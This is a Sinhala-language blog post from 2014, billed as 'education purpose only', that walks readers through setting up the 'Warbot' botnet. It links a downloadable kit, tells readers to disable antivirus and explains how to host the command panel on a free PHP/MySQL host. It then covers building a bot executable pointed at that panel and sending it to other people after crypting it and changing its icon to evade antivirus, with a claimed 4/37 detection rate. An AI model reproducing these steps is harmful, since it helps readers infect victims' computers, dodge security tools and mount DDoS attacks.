2014-05-15

අපේම කියල BOTNET එකක් හදාගමු.(Education Purpose Only)


කොමද යාලුවනෙ ඔයාලට..ගොඩ දවසකින් මුකුත් ලිපියක් දෙන්න බැරි උනා...ඔන්න ඉතින් අද අපි කාටත් නිවාඩු දවසනෙ...ඒක නිසා පෝස්‍ටුවක් දාන්න හිතුව..ඔයාලට මම මුලින් දුන්න නේද Botnet එකක් කියන්නෙ මොකක්ද,ඒකෙන් වෙන්නෙ මොකක්ද කියන එක ගැන ලිපියක්...බැලුවෙ නැත්තම් මෙතනින් යන්න...ඉතින් ගොඩක් යාලුවො ඉල්ලුව Botnet එකක් හදන්නෙ කොමද කියල දෙන්න කියල.හරි මම අද ඔයාලට දෙන්නෙ කොමද මෙ Botnet එකක් හදන්නෙ කියල..
මේ Botnet වැඩිපුරම යොදාගන්නෙ DDoS වලටනෙ...ඊලඟ ලිපියෙන් දෙන්නම් DDoS කියන්නෙ මොකක්ද?කොහොමද ඒකට Botnet එකක් බාවිතාකරන්නෙ කියල..

මුලින්ම මේක බාගන්න..ඊට පස්සෙ Virus Gard එක Botnet හදා ගන්නකන් Off කරන්න.. 

                                                                    WARBOT
https://www.dropbox.com/s/iu1k925en0traph/Warbot.rar


මුලින්ම Botnet එක හදාගන්න අපි Web Host(PHP & MySQL) එකක් ‍තෝරගන්න ඔනි..
මම පහලින් දෙන Free Web Host එකකට ගිහින් Register වෙන්නෙ..මම භාවිතාකරෙ 000webhost එක..එකෙ ටිකක් නීති වැඩි...


Register වෙල මුලින්ම ඔයා Control Panel එකට ගිහින් MySQL Database එකක් හදාගන්න ඕන..MySQL කියන තැන ක්ලික් කරන්නකො..




MySQL Database දැන් ඔයා තොරතුරු ටික දීල එක හදාගන්න..ලබාදෙන Database User Name Password වගේ දේවල් හොඳින් මතක තියාගන්න...




මේටික Notepad එකක දාල Save කරගන්න...ඉස්සරහට ඕනි වෙනව..හරි..ඔන්න MySQL Database එක හදාගෙන ඉවරයි..ආයෙ යන්න Control Panel එකට..ගිහින් File Manager කියන එක ක්ලික් කරන්න.
 
File Manager වල  Public HTML Folder එක ක්ලික් කරන්න.ඒකෙ Upload වලට ගිහින් මම උඩින් බාගන්න දුන්න Zip File එකෙ ඇතුලෙ ඇති Warbot File කියල එකක්..අන්න ඒක ඒක තෝරලා දෙන්න..


  
දැං පහත විදියට ඔයාගෙ Domain එකට යන්න.http://yourdomain.com/Warbot File/install/index.php
Domain එකට ගියාම ඔයා Upload  කරපු Botnet එක Install කරන්න ඒවි.. නිවරදි තොරතුරු ටික දීල Install දෙන්න..කලින් Notepad එකක MySQL Database Save කරගන්න කිව්වෙ ඔයාලට අමතක වෙන නිසා ඔයටික..


වැඩේ හරි නම් Installation Is Complete  කියලා මැසේජ් එකක් එයි 


දැං ආයෙ File Manager වලට යන්න.. Public HTML => Warbot File එක ඇතුලට යන්න..Install කියන Folder එකට Tick එක දාලා Delete කරන්න...


 දැන් හරි..දැන් ඔයාට http://yourdomain.com/Warbot File/index.php කියන එකට ගිහින් ඔයාගෙ එකට Log වෙන්න පුලුවන්..




ඔන්න ඉතින් අපි Botnet එක හැදුව...දැන් ඉතින් මේකට Zoombi එකතුකරගන්න එපයි..ඒකට ඉතින් මෙහෙම කරන්න.. 
මම දීපු ZIP එක ඇතුලෙ ඇති Warbot කියලා Folder එකක්...ඇතුලෙ ඇති Builder සහ Original කියලා File දෙකක්. ඕකෙන් Builder Run කරන්න.CMD එක එයි.ඔයාගෙ Bot එකෙ URL එක දීල Enter එක 5ස් පාරක් ගහන්න..



 
දැන් ඒ Foloder එකෙ තියෙන Original.exe එක තම ඔයා වෙන අයට යවන්න  ඕනි..නිකම යවල වැඩක් නැ...Virus Gard වලින් අල්ලනව ඒක නිසා Fud Crypt කරල Icon Change කරල යවන්න...
පුන්චි උදාහරනයක් දෙන්නම්..මෙන්න මම Crypt කරාම ආපු Result එක(4/37)..




ගැටලුවක් ආවොත් කමෙන්ට් එකක් දාන්න..වැඩෙ හරියට කරගත්තනම් කමෙන්ට් එකක් දාල යන්න...ඒක අනිත් යාලුවන්ටත් පහසුවක් වේවි..එහෙනම් මේ පෝස්ට් එකත් ඔයාට වැදගත් උනානම් Like එකක් දාල Share පාරක් දාන්න අනිත් යාලුවන්ටත් දැනගන්න...ආයෙත් දවසක මේ වගෙ වටින පෝස්‍ටුවක් අරන්න එන්නම්..මම යනව...ඔයාල හැමෝටම බුදු සරනයි...පරිස්සමෙන් ඉන්න....


ප්‍රතිචාර